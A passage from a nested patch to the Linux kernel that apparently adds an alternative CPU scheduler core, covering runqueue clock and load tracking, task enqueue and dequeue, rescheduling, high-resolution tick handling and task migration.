++	if (irq_delta > delta)
++		irq_delta = delta;
++
++	rq->prev_irq_time += irq_delta;
++	delta -= irq_delta;
++	psi_account_irqtime(rq->curr, irq_delta);
++#endif
++#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
++	if (static_key_false((&paravirt_steal_rq_enabled))) {
++		steal = paravirt_steal_clock(cpu_of(rq));
++		steal -= rq->prev_steal_time_rq;
++
++		if (unlikely(steal > delta))
++			steal = delta;
++
++		rq->prev_steal_time_rq += steal;
++		delta -= steal;
++	}
++#endif
++
++	rq->clock_task += delta;
++
++#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
++	if ((irq_delta + steal))
++		update_irq_load_avg(rq, irq_delta + steal);
++#endif
++}
++
++static inline void update_rq_clock(struct rq *rq)
++{
++	s64 delta = sched_clock_cpu(cpu_of(rq)) - rq->clock;
++
++	if (unlikely(delta <= 0))
++		return;
++	rq->clock += delta;
++	update_rq_time_edge(rq);
++	update_rq_clock_task(rq, delta);
++}
++
++/*
++ * RQ Load update routine
++ */
++#define RQ_LOAD_HISTORY_BITS		(sizeof(s32) * 8ULL)
++#define RQ_UTIL_SHIFT			(8)
++#define RQ_LOAD_HISTORY_TO_UTIL(l)	(((l) >> (RQ_LOAD_HISTORY_BITS - 1 - RQ_UTIL_SHIFT)) & 0xff)
++
++#define LOAD_BLOCK(t)		((t) >> 17)
++#define LOAD_HALF_BLOCK(t)	((t) >> 16)
++#define BLOCK_MASK(t)		((t) & ((0x01 << 18) - 1))
++#define LOAD_BLOCK_BIT(b)	(1UL << (RQ_LOAD_HISTORY_BITS - 1 - (b)))
++#define CURRENT_LOAD_BIT	LOAD_BLOCK_BIT(0)
++
++static inline void rq_load_update(struct rq *rq)
++{
++	u64 time = rq->clock;
++	u64 delta = min(LOAD_BLOCK(time) - LOAD_BLOCK(rq->load_stamp),
++			RQ_LOAD_HISTORY_BITS - 1);
++	u64 prev = !!(rq->load_history & CURRENT_LOAD_BIT);
++	u64 curr = !!rq->nr_running;
++
++	if (delta) {
++		rq->load_history = rq->load_history >> delta;
++
++		if (delta < RQ_UTIL_SHIFT) {
++			rq->load_block += (~BLOCK_MASK(rq->load_stamp)) * prev;
++			if (!!LOAD_HALF_BLOCK(rq->load_block) ^ curr)
++				rq->load_history ^= LOAD_BLOCK_BIT(delta);
++		}
++
++		rq->load_block = BLOCK_MASK(time) * prev;
++	} else {
++		rq->load_block += (time - rq->load_stamp) * prev;
++	}
++	if (prev ^ curr)
++		rq->load_history ^= CURRENT_LOAD_BIT;
++	rq->load_stamp = time;
++}
++
++unsigned long rq_load_util(struct rq *rq, unsigned long max)
++{
++	return RQ_LOAD_HISTORY_TO_UTIL(rq->load_history) * (max >> RQ_UTIL_SHIFT);
++}
++
++#ifdef CONFIG_SMP
++unsigned long sched_cpu_util(int cpu)
++{
++	return rq_load_util(cpu_rq(cpu), arch_scale_cpu_capacity(cpu));
++}
++#endif /* CONFIG_SMP */
++
++#ifdef CONFIG_CPU_FREQ
++/**
++ * cpufreq_update_util - Take a note about CPU utilization changes.
++ * @rq: Runqueue to carry out the update for.
++ * @flags: Update reason flags.
++ *
++ * This function is called by the scheduler on the CPU whose utilization is
++ * being updated.
++ *
++ * It can only be called from RCU-sched read-side critical sections.
++ *
++ * The way cpufreq is currently arranged requires it to evaluate the CPU
++ * performance state (frequency/voltage) on a regular basis to prevent it from
++ * being stuck in a completely inadequate performance level for too long.
++ * That is not guaranteed to happen if the updates are only triggered from CFS
++ * and DL, though, because they may not be coming in if only RT tasks are
++ * active all the time (or there are RT tasks only).
++ *
++ * As a workaround for that issue, this function is called periodically by the
++ * RT sched class to trigger extra cpufreq updates to prevent it from stalling,
++ * but that really is a band-aid.  Going forward it should be replaced with
++ * solutions targeted more specifically at RT tasks.
++ */
++static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
++{
++	struct update_util_data *data;
++
++#ifdef CONFIG_SMP
++	rq_load_update(rq);
++#endif
++	data = rcu_dereference_sched(*per_cpu_ptr(&cpufreq_update_util_data,
++						  cpu_of(rq)));
++	if (data)
++		data->func(data, rq_clock(rq), flags);
++}
++#else
++static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
++{
++#ifdef CONFIG_SMP
++	rq_load_update(rq);
++#endif
++}
++#endif /* CONFIG_CPU_FREQ */
++
++#ifdef CONFIG_NO_HZ_FULL
++/*
++ * Tick may be needed by tasks in the runqueue depending on their policy and
++ * requirements. If tick is needed, lets send the target an IPI to kick it out
++ * of nohz mode if necessary.
++ */
++static inline void sched_update_tick_dependency(struct rq *rq)
++{
++	int cpu = cpu_of(rq);
++
++	if (!tick_nohz_full_cpu(cpu))
++		return;
++
++	if (rq->nr_running < 2)
++		tick_nohz_dep_clear_cpu(cpu, TICK_DEP_BIT_SCHED);
++	else
++		tick_nohz_dep_set_cpu(cpu, TICK_DEP_BIT_SCHED);
++}
++#else /* !CONFIG_NO_HZ_FULL */
++static inline void sched_update_tick_dependency(struct rq *rq) { }
++#endif
++
++bool sched_task_on_rq(struct task_struct *p)
++{
++	return task_on_rq_queued(p);
++}
++
++unsigned long get_wchan(struct task_struct *p)
++{
++	unsigned long ip = 0;
++	unsigned int state;
++
++	if (!p || p == current)
++		return 0;
++
++	/* Only get wchan if task is blocked and we can keep it that way. */
++	raw_spin_lock_irq(&p->pi_lock);
++	state = READ_ONCE(p->__state);
++	smp_rmb(); /* see try_to_wake_up() */
++	if (state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq)
++		ip = __get_wchan(p);
++	raw_spin_unlock_irq(&p->pi_lock);
++
++	return ip;
++}
++
++/*
++ * Add/Remove/Requeue task to/from the runqueue routines
++ * Context: rq->lock
++ */
++#define __SCHED_DEQUEUE_TASK(p, rq, flags)					\
++	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
++	sched_info_dequeue(rq, p);						\
++										\
++	list_del(&p->sq_node);							\
++	if (list_empty(&rq->queue.heads[p->sq_idx])) 				\
++		clear_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++
++#define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
++	sched_info_enqueue(rq, p);					\
++	psi_enqueue(p, flags);						\
++									\
++	p->sq_idx = task_sched_prio_idx(p, rq);				\
++	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
++	set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++
++static inline void dequeue_task(struct task_struct *p, struct rq *rq, int flags)
++{
++	lockdep_assert_held(&rq->lock);
++
++	/*printk(KERN_INFO "sched: dequeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: dequeue task reside on cpu%d from cpu%d\n",
++		  task_cpu(p), cpu_of(rq));
++
++	__SCHED_DEQUEUE_TASK(p, rq, flags);
++	--rq->nr_running;
++#ifdef CONFIG_SMP
++	if (1 == rq->nr_running)
++		cpumask_clear_cpu(cpu_of(rq), &sched_rq_pending_mask);
++#endif
++
++	sched_update_tick_dependency(rq);
++}
++
++static inline void enqueue_task(struct task_struct *p, struct rq *rq, int flags)
++{
++	lockdep_assert_held(&rq->lock);
++
++	/*printk(KERN_INFO "sched: enqueue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: enqueue task reside on cpu%d to cpu%d\n",
++		  task_cpu(p), cpu_of(rq));
++
++	__SCHED_ENQUEUE_TASK(p, rq, flags);
++	update_sched_rq_watermark(rq);
++	++rq->nr_running;
++#ifdef CONFIG_SMP
++	if (2 == rq->nr_running)
++		cpumask_set_cpu(cpu_of(rq), &sched_rq_pending_mask);
++#endif
++
++	sched_update_tick_dependency(rq);
++}
++
++static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx)
++{
++	lockdep_assert_held(&rq->lock);
++	/*printk(KERN_INFO "sched: requeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: cpu[%d] requeue task reside on cpu%d\n",
++		  cpu_of(rq), task_cpu(p));
++
++	list_del(&p->sq_node);
++	list_add_tail(&p->sq_node, &rq->queue.heads[idx]);
++	if (idx != p->sq_idx) {
++		if (list_empty(&rq->queue.heads[p->sq_idx]))
++			clear_bit(sched_idx2prio(p->sq_idx, rq),
++				  rq->queue.bitmap);
++		p->sq_idx = idx;
++		set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++		update_sched_rq_watermark(rq);
++	}
++}
++
++/*
++ * cmpxchg based fetch_or, macro so it works for different integer types
++ */
++#define fetch_or(ptr, mask)						\
++	({								\
++		typeof(ptr) _ptr = (ptr);				\
++		typeof(mask) _mask = (mask);				\
++		typeof(*_ptr) _val = *_ptr;				\
++									\
++		do {							\
++		} while (!try_cmpxchg(_ptr, &_val, _val | _mask));	\
++	_val;								\
++})
++
++#if defined(CONFIG_SMP) && defined(TIF_POLLING_NRFLAG)
++/*
++ * Atomically set TIF_NEED_RESCHED and test for TIF_POLLING_NRFLAG,
++ * this avoids any races wrt polling state changes and thereby avoids
++ * spurious IPIs.
++ */
++static inline bool set_nr_and_not_polling(struct task_struct *p)
++{
++	struct thread_info *ti = task_thread_info(p);
++	return !(fetch_or(&ti->flags, _TIF_NEED_RESCHED) & _TIF_POLLING_NRFLAG);
++}
++
++/*
++ * Atomically set TIF_NEED_RESCHED if TIF_POLLING_NRFLAG is set.
++ *
++ * If this returns true, then the idle task promises to call
++ * sched_ttwu_pending() and reschedule soon.
++ */
++static bool set_nr_if_polling(struct task_struct *p)
++{
++	struct thread_info *ti = task_thread_info(p);
++	typeof(ti->flags) val = READ_ONCE(ti->flags);
++
++	for (;;) {
++		if (!(val & _TIF_POLLING_NRFLAG))
++			return false;
++		if (val & _TIF_NEED_RESCHED)
++			return true;
++		if (try_cmpxchg(&ti->flags, &val, val | _TIF_NEED_RESCHED))
++			break;
++	}
++	return true;
++}
++
++#else
++static inline bool set_nr_and_not_polling(struct task_struct *p)
++{
++	set_tsk_need_resched(p);
++	return true;
++}
++
++#ifdef CONFIG_SMP
++static inline bool set_nr_if_polling(struct task_struct *p)
++{
++	return false;
++}
++#endif
++#endif
++
++static bool __wake_q_add(struct wake_q_head *head, struct task_struct *task)
++{
++	struct wake_q_node *node = &task->wake_q;
++
++	/*
++	 * Atomically grab the task, if ->wake_q is !nil already it means
++	 * it's already queued (either by us or someone else) and will get the
++	 * wakeup due to that.
++	 *
++	 * In order to ensure that a pending wakeup will observe our pending
++	 * state, even in the failed case, an explicit smp_mb() must be used.
++	 */
++	smp_mb__before_atomic();
++	if (unlikely(cmpxchg_relaxed(&node->next, NULL, WAKE_Q_TAIL)))
++		return false;
++
++	/*
++	 * The head is context local, there can be no concurrency.
++	 */
++	*head->lastp = node;
++	head->lastp = &node->next;
++	return true;
++}
++
++/**
++ * wake_q_add() - queue a wakeup for 'later' waking.
++ * @head: the wake_q_head to add @task to
++ * @task: the task to queue for 'later' wakeup
++ *
++ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
++ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
++ * instantly.
++ *
++ * This function must be used as-if it were wake_up_process(); IOW the task
++ * must be ready to be woken at this location.
++ */
++void wake_q_add(struct wake_q_head *head, struct task_struct *task)
++{
++	if (__wake_q_add(head, task))
++		get_task_struct(task);
++}
++
++/**
++ * wake_q_add_safe() - safely queue a wakeup for 'later' waking.
++ * @head: the wake_q_head to add @task to
++ * @task: the task to queue for 'later' wakeup
++ *
++ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
++ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
++ * instantly.
++ *
++ * This function must be used as-if it were wake_up_process(); IOW the task
++ * must be ready to be woken at this location.
++ *
++ * This function is essentially a task-safe equivalent to wake_q_add(). Callers
++ * that already hold reference to @task can call the 'safe' version and trust
++ * wake_q to do the right thing depending whether or not the @task is already
++ * queued for wakeup.
++ */
++void wake_q_add_safe(struct wake_q_head *head, struct task_struct *task)
++{
++	if (!__wake_q_add(head, task))
++		put_task_struct(task);
++}
++
++void wake_up_q(struct wake_q_head *head)
++{
++	struct wake_q_node *node = head->first;
++
++	while (node != WAKE_Q_TAIL) {
++		struct task_struct *task;
++
++		task = container_of(node, struct task_struct, wake_q);
++		/* task can safely be re-inserted now: */
++		node = node->next;
++		task->wake_q.next = NULL;
++
++		/*
++		 * wake_up_process() executes a full barrier, which pairs with
++		 * the queueing in wake_q_add() so as not to miss wakeups.
++		 */
++		wake_up_process(task);
++		put_task_struct(task);
++	}
++}
++
++/*
++ * resched_curr - mark rq's current task 'to be rescheduled now'.
++ *
++ * On UP this means the setting of the need_resched flag, on SMP it
++ * might also involve a cross-CPU call to trigger the scheduler on
++ * the target CPU.
++ */
++void resched_curr(struct rq *rq)
++{
++	struct task_struct *curr = rq->curr;
++	int cpu;
++
++	lockdep_assert_held(&rq->lock);
++
++	if (test_tsk_need_resched(curr))
++		return;
++
++	cpu = cpu_of(rq);
++	if (cpu == smp_processor_id()) {
++		set_tsk_need_resched(curr);
++		set_preempt_need_resched();
++		return;
++	}
++
++	if (set_nr_and_not_polling(curr))
++		smp_send_reschedule(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++void resched_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (cpu_online(cpu) || cpu == smp_processor_id())
++		resched_curr(cpu_rq(cpu));
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++}
++
++#ifdef CONFIG_SMP
++#ifdef CONFIG_NO_HZ_COMMON
++void nohz_balance_enter_idle(int cpu) {}
++
++void select_nohz_load_balancer(int stop_tick) {}
++
++void set_cpu_sd_state_idle(void) {}
++
++/*
++ * In the semi idle case, use the nearest busy CPU for migrating timers
++ * from an idle CPU.  This is good for power-savings.
++ *
++ * We don't do similar optimization for completely idle system, as
++ * selecting an idle CPU will add more delays to the timers than intended
++ * (as that CPU's timer base may not be uptodate wrt jiffies etc).
++ */
++int get_nohz_timer_target(void)
++{
++	int i, cpu = smp_processor_id(), default_cpu = -1;
++	struct cpumask *mask;
++	const struct cpumask *hk_mask;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TIMER)) {
++		if (!idle_cpu(cpu))
++			return cpu;
++		default_cpu = cpu;
++	}
++
++	hk_mask = housekeeping_cpumask(HK_TYPE_TIMER);
++
++	for (mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++	     mask < per_cpu(sched_cpu_topo_end_mask, cpu); mask++)
++		for_each_cpu_and(i, mask, hk_mask)
++			if (!idle_cpu(i))
++				return i;
++
++	if (default_cpu == -1)
++		default_cpu = housekeeping_any_cpu(HK_TYPE_TIMER);
++	cpu = default_cpu;
++
++	return cpu;
++}
++
++/*
++ * When add_timer_on() enqueues a timer into the timer wheel of an
++ * idle CPU then this timer might expire before the next timer event
++ * which is scheduled to wake up that CPU. In case of a completely
++ * idle system the next event might even be infinite time into the
++ * future. wake_up_idle_cpu() ensures that the CPU is woken up and
++ * leaves the inner idle loop so the newly added timer is taken into
++ * account when the CPU goes back to idle and evaluates the timer
++ * wheel for the next timer event.
++ */
++static inline void wake_up_idle_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (cpu == smp_processor_id())
++		return;
++
++	if (set_nr_and_not_polling(rq->idle))
++		smp_send_reschedule(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++static inline bool wake_up_full_nohz_cpu(int cpu)
++{
++	/*
++	 * We just need the target to call irq_exit() and re-evaluate
++	 * the next tick. The nohz full kick at least implies that.
++	 * If needed we can still optimize that later with an
++	 * empty IRQ.
++	 */
++	if (cpu_is_offline(cpu))
++		return true;  /* Don't try to wake offline CPUs. */
++	if (tick_nohz_full_cpu(cpu)) {
++		if (cpu != smp_processor_id() ||
++		    tick_nohz_tick_stopped())
++			tick_nohz_full_kick_cpu(cpu);
++		return true;
++	}
++
++	return false;
++}
++
++void wake_up_nohz_cpu(int cpu)
++{
++	if (!wake_up_full_nohz_cpu(cpu))
++		wake_up_idle_cpu(cpu);
++}
++
++static void nohz_csd_func(void *info)
++{
++	struct rq *rq = info;
++	int cpu = cpu_of(rq);
++	unsigned int flags;
++
++	/*
++	 * Release the rq::nohz_csd.
++	 */
++	flags = atomic_fetch_andnot(NOHZ_KICK_MASK, nohz_flags(cpu));
++	WARN_ON(!(flags & NOHZ_KICK_MASK));
++
++	rq->idle_balance = idle_cpu(cpu);
++	if (rq->idle_balance && !need_resched()) {
++		rq->nohz_idle_balance = flags;
++		raise_softirq_irqoff(SCHED_SOFTIRQ);
++	}
++}
++
++#endif /* CONFIG_NO_HZ_COMMON */
++#endif /* CONFIG_SMP */
++
++static inline void check_preempt_curr(struct rq *rq)
++{
++	if (sched_rq_first_task(rq) != rq->curr)
++		resched_curr(rq);
++}
++
++#ifdef CONFIG_SCHED_HRTICK
++/*
++ * Use HR-timers to deliver accurate preemption points.
++ */
++
++static void hrtick_clear(struct rq *rq)
++{
++	if (hrtimer_active(&rq->hrtick_timer))
++		hrtimer_cancel(&rq->hrtick_timer);
++}
++
++/*
++ * High-resolution timer tick.
++ * Runs from hardirq context with interrupts disabled.
++ */
++static enum hrtimer_restart hrtick(struct hrtimer *timer)
++{
++	struct rq *rq = container_of(timer, struct rq, hrtick_timer);
++
++	WARN_ON_ONCE(cpu_of(rq) != smp_processor_id());
++
++	raw_spin_lock(&rq->lock);
++	resched_curr(rq);
++	raw_spin_unlock(&rq->lock);
++
++	return HRTIMER_NORESTART;
++}
++
++/*
++ * Use hrtick when:
++ *  - enabled by features
++ *  - hrtimer is actually high res
++ */
++static inline int hrtick_enabled(struct rq *rq)
++{
++	/**
++	 * Alt schedule FW doesn't support sched_feat yet
++	if (!sched_feat(HRTICK))
++		return 0;
++	*/
++	if (!cpu_active(cpu_of(rq)))
++		return 0;
++	return hrtimer_is_hres_active(&rq->hrtick_timer);
++}
++
++#ifdef CONFIG_SMP
++
++static void __hrtick_restart(struct rq *rq)
++{
++	struct hrtimer *timer = &rq->hrtick_timer;
++	ktime_t time = rq->hrtick_time;
++
++	hrtimer_start(timer, time, HRTIMER_MODE_ABS_PINNED_HARD);
++}
++
++/*
++ * called from hardirq (IPI) context
++ */
++static void __hrtick_start(void *arg)
++{
++	struct rq *rq = arg;
++
++	raw_spin_lock(&rq->lock);
++	__hrtick_restart(rq);
++	raw_spin_unlock(&rq->lock);
++}
++
++/*
++ * Called to set the hrtick timer state.
++ *
++ * called with rq->lock held and irqs disabled
++ */
++void hrtick_start(struct rq *rq, u64 delay)
++{
++	struct hrtimer *timer = &rq->hrtick_timer;
++	s64 delta;
++
++	/*
++	 * Don't schedule slices shorter than 10000ns, that just
++	 * doesn't make sense and can cause timer DoS.
++	 */
++	delta = max_t(s64, delay, 10000LL);
++
++	rq->hrtick_time = ktime_add_ns(timer->base->get_time(), delta);
++
++	if (rq == this_rq())
++		__hrtick_restart(rq);
++	else
++		smp_call_function_single_async(cpu_of(rq), &rq->hrtick_csd);
++}
++
++#else
++/*
++ * Called to set the hrtick timer state.
++ *
++ * called with rq->lock held and irqs disabled
++ */
++void hrtick_start(struct rq *rq, u64 delay)
++{
++	/*
++	 * Don't schedule slices shorter than 10000ns, that just
++	 * doesn't make sense. Rely on vruntime for fairness.
++	 */
++	delay = max_t(u64, delay, 10000LL);
++	hrtimer_start(&rq->hrtick_timer, ns_to_ktime(delay),
++		      HRTIMER_MODE_REL_PINNED_HARD);
++}
++#endif /* CONFIG_SMP */
++
++static void hrtick_rq_init(struct rq *rq)
++{
++#ifdef CONFIG_SMP
++	INIT_CSD(&rq->hrtick_csd, __hrtick_start, rq);
++#endif
++
++	hrtimer_init(&rq->hrtick_timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_HARD);
++	rq->hrtick_timer.function = hrtick;
++}
++#else	/* CONFIG_SCHED_HRTICK */
++static inline int hrtick_enabled(struct rq *rq)
++{
++	return 0;
++}
++
++static inline void hrtick_clear(struct rq *rq)
++{
++}
++
++static inline void hrtick_rq_init(struct rq *rq)
++{
++}
++#endif	/* CONFIG_SCHED_HRTICK */
++
++static inline int __normal_prio(int policy, int rt_prio, int static_prio)
++{
++	return rt_policy(policy) ? (MAX_RT_PRIO - 1 - rt_prio) :
++		static_prio + MAX_PRIORITY_ADJ;
++}
++
++/*
++ * Calculate the expected normal priority: i.e. priority
++ * without taking RT-inheritance into account. Might be
++ * boosted by interactivity modifiers. Changes upon fork,
++ * setprio syscalls, and whenever the interactivity
++ * estimator recalculates.
++ */
++static inline int normal_prio(struct task_struct *p)
++{
++	return __normal_prio(p->policy, p->rt_priority, p->static_prio);
++}
++
++/*
++ * Calculate the current priority, i.e. the priority
++ * taken into account by the scheduler. This value might
++ * be boosted by RT tasks as it will be RT if the task got
++ * RT-boosted. If not then it returns p->normal_prio.
++ */
++static int effective_prio(struct task_struct *p)
++{
++	p->normal_prio = normal_prio(p);
++	/*
++	 * If we are RT tasks or we were boosted to RT priority,
++	 * keep the priority unchanged. Otherwise, update priority
++	 * to the normal priority:
++	 */
++	if (!rt_prio(p->prio))
++		return p->normal_prio;
++	return p->prio;
++}
++
++/*
++ * activate_task - move a task to the runqueue.
++ *
++ * Context: rq->lock
++ */
++static void activate_task(struct task_struct *p, struct rq *rq)
++{
++	enqueue_task(p, rq, ENQUEUE_WAKEUP);
++	p->on_rq = TASK_ON_RQ_QUEUED;
++
++	/*
++	 * If in_iowait is set, the code below may not trigger any cpufreq
++	 * utilization updates, so do it here explicitly with the IOWAIT flag
++	 * passed.
++	 */
++	cpufreq_update_util(rq, SCHED_CPUFREQ_IOWAIT * p->in_iowait);
++}
++
++/*
++ * deactivate_task - remove a task from the runqueue.
++ *
++ * Context: rq->lock
++ */
++static inline void deactivate_task(struct task_struct *p, struct rq *rq)
++{
++	dequeue_task(p, rq, DEQUEUE_SLEEP);
++	p->on_rq = 0;
++	cpufreq_update_util(rq, 0);
++}
++
++static inline void __set_task_cpu(struct task_struct *p, unsigned int cpu)
++{
++#ifdef CONFIG_SMP
++	/*
++	 * After ->cpu is set up to a new value, task_access_lock(p, ...) can be
++	 * successfully executed on another CPU. We must ensure that updates of
++	 * per-task data have been completed by this moment.
++	 */
++	smp_wmb();
++
++	WRITE_ONCE(task_thread_info(p)->cpu, cpu);
++#endif
++}
++
++static inline bool is_migration_disabled(struct task_struct *p)
++{
++#ifdef CONFIG_SMP
++	return p->migration_disabled;
++#else
++	return false;
++#endif
++}
++
++#define SCA_CHECK		0x01
++#define SCA_USER		0x08
++
++#ifdef CONFIG_SMP
++
++void set_task_cpu(struct task_struct *p, unsigned int new_cpu)
++{
++#ifdef CONFIG_SCHED_DEBUG
++	unsigned int state = READ_ONCE(p->__state);
++
++	/*
++	 * We should never call set_task_cpu() on a blocked task,
++	 * ttwu() will sort out the placement.
++	 */
++	WARN_ON_ONCE(state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq);
++
++#ifdef CONFIG_LOCKDEP
++	/*
++	 * The caller should hold either p->pi_lock or rq->lock, when changing
++	 * a task's CPU. ->pi_lock for waking tasks, rq->lock for runnable tasks.
++	 *
++	 * sched_move_task() holds both and thus holding either pins the cgroup,
++	 * see task_group().
++	 */
++	WARN_ON_ONCE(debug_locks && !(lockdep_is_held(&p->pi_lock) ||
++				      lockdep_is_held(&task_rq(p)->lock)));
++#endif
++	/*
++	 * Clearly, migrating tasks to offline CPUs is a fairly daft thing.
++	 */
++	WARN_ON_ONCE(!cpu_online(new_cpu));
++
++	WARN_ON_ONCE(is_migration_disabled(p));
++#endif
++	if (task_cpu(p) == new_cpu)
++		return;
++	trace_sched_migrate_task(p, new_cpu);
++	rseq_migrate(p);
++	perf_event_task_migrate(p);
++
++	__set_task_cpu(p, new_cpu);
++}
++
++#define MDF_FORCE_ENABLED	0x80
++
++static void
++__do_set_cpus_ptr(struct task_struct *p, const struct cpumask *new_mask)
++{
++	/*
++	 * This here violates the locking rules for affinity, since we're only
++	 * supposed to change these variables while holding both rq->lock and
++	 * p->pi_lock.
++	 *
++	 * HOWEVER, it magically works, because ttwu() is the only code that
++	 * accesses these variables under p->pi_lock and only does so after
++	 * smp_cond_load_acquire(&p->on_cpu, !VAL), and we're in __schedule()
++	 * before finish_task().
++	 *
++	 * XXX do further audits, this smells like something putrid.
++	 */
++	SCHED_WARN_ON(!p->on_cpu);
++	p->cpus_ptr = new_mask;
++}
++
++void migrate_disable(void)
++{
++	struct task_struct *p = current;
++	int cpu;
++
++	if (p->migration_disabled) {
++		p->migration_disabled++;
++		return;
++	}
++
++	preempt_disable();
++	cpu = smp_processor_id();
++	if (cpumask_test_cpu(cpu, &p->cpus_mask)) {
++		cpu_rq(cpu)->nr_pinned++;
++		p->migration_disabled = 1;
++		p->migration_flags &= ~MDF_FORCE_ENABLED;
++
++		/*
++		 * Violates locking rules! see comment in __do_set_cpus_ptr().
++		 */
++		if (p->cpus_ptr == &p->cpus_mask)
++			__do_set_cpus_ptr(p, cpumask_of(cpu));
++	}
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(migrate_disable);
++
++void migrate_enable(void)
++{
++	struct task_struct *p = current;
++
++	if (0 == p->migration_disabled)
++		return;
++
++	if (p->migration_disabled > 1) {
++		p->migration_disabled--;
++		return;
++	}
++
++	if (WARN_ON_ONCE(!p->migration_disabled))
++		return;
++
++	/*
++	 * Ensure stop_task runs either before or after this, and that
++	 * __set_cpus_allowed_ptr(SCA_MIGRATE_ENABLE) doesn't schedule().
++	 */
++	preempt_disable();
++	/*
++	 * Assumption: current should be running on allowed cpu
++	 */
++	WARN_ON_ONCE(!cpumask_test_cpu(smp_processor_id(), &p->cpus_mask));
++	if (p->cpus_ptr != &p->cpus_mask)
++		__do_set_cpus_ptr(p, &p->cpus_mask);
++	/*
++	 * Mustn't clear migration_disabled() until cpus_ptr points back at the
++	 * regular cpus_mask, otherwise things that race (eg.
++	 * select_fallback_rq) get confused.
++	 */
++	barrier();
++	p->migration_disabled = 0;
++	this_rq()->nr_pinned--;
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(migrate_enable);
++
++static inline bool rq_has_pinned_tasks(struct rq *rq)
++{
++	return rq->nr_pinned;
++}
++
++/*
++ * Per-CPU kthreads are allowed to run on !active && online CPUs, see
++ * __set_cpus_allowed_ptr() and select_fallback_rq().
++ */
++static inline bool is_cpu_allowed(struct task_struct *p, int cpu)
++{
++	/* When not in the task's cpumask, no point in looking further. */
++	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
++		return false;
++
++	/* migrate_disabled() must be allowed to finish. */
++	if (is_migration_disabled(p))
++		return cpu_online(cpu);
++
++	/* Non kernel threads are not allowed during either online or offline. */
++	if (!(p->flags & PF_KTHREAD))
++		return cpu_active(cpu) && task_cpu_possible(cpu, p);
++
++	/* KTHREAD_IS_PER_CPU is always allowed. */
++	if (kthread_is_per_cpu(p))
++		return cpu_online(cpu);
++
++	/* Regular kernel threads don't get to stay during offline. */
++	if (cpu_dying(cpu))
++		return false;
++
++	/* But are allowed during online. */
++	return cpu_online(cpu);
++}
++
++/*
++ * This is how migration works:
++ *
++ * 1) we invoke migration_cpu_stop() on the target CPU using
++ *    stop_one_cpu().
++ * 2) stopper starts to run (implicitly forcing the migrated thread
++ *    off the CPU)
++ * 3) it checks whether the migrated task is still in the wrong runqueue.
++ * 4) if it's in the wrong runqueue then the migration thread removes
++ *    it and puts it into the right queue.
++ * 5) stopper completes and stop_one_cpu() returns and the migration
++ *    is done.
++ */
++
++/*
++ * move_queued_task - move a queued task to new rq.
++ *
++ * Returns (locked) new rq. Old rq's lock is released.
++ */
++static struct rq *move_queued_task(struct rq *rq, struct task_struct *p, int
++				   new_cpu)
++{
++	lockdep_assert_held(&rq->lock);
++
++	WRITE_ONCE(p->on_rq, TASK_ON_RQ_MIGRATING);
++	dequeue_task(p, rq, 0);
++	update_sched_rq_watermark(rq);
++	set_task_cpu(p, new_cpu);
++	raw_spin_unlock(&rq->lock);
++
++	rq = cpu_rq(new_cpu);
++
++	raw_spin_lock(&rq->lock);
++	WARN_ON_ONCE(task_cpu(p) != new_cpu);
++	sched_task_sanity_check(p, rq);
++	enqueue_task(p, rq, 0);
++	p->on_rq = TASK_ON_RQ_QUEUED;
++	check_preempt_curr(rq);
++
++	return rq;
++}
++
++struct migration_arg {
++	struct task_struct *task;
++	int dest_cpu;
++};
++
++/*
++ * Move (not current) task off this CPU, onto the destination CPU. We're doing
++ * this because either it can't run here any more (set_cpus_allowed()
++ * away from this CPU, or CPU going down), or because we're
++ * attempting to rebalance this task on exec (sched_exec).
++ *
++ * So we race with normal scheduler movements, but that's OK, as long
++ * as the task is no longer on this CPU.
++ */
++static struct rq *__migrate_task(struct rq *rq, struct task_struct *p, int
++				 dest_cpu)
++{
++	/* Affinity changed (again). */
++	if (!is_cpu_allowed(p, dest_cpu))
++		return rq;
++
++	update_rq_clock(rq);
++	return move_queued_task(rq, p, dest_cpu);
++}
++
++/*
++ * migration_cpu_stop - this will be executed by a highprio stopper thread
++ * and performs thread migration by bumping thread off CPU then
++ * 'pushing' onto another runqueue.
++ */
++static int migration_cpu_stop(void *data)
++{
++	struct migration_arg *arg = data;
++	struct task_struct *p = arg->task;
++	struct rq *rq = this_rq();
++	unsigned long flags;
++
++	/*
++	 * The original target CPU might have gone down and we might
++	 * be on another CPU but it doesn't matter.
++	 */
++	local_irq_save(flags);
++	/*
++	 * We need to explicitly wake pending tasks before running
++	 * __migrate_task() such that we will not miss enforcing cpus_ptr
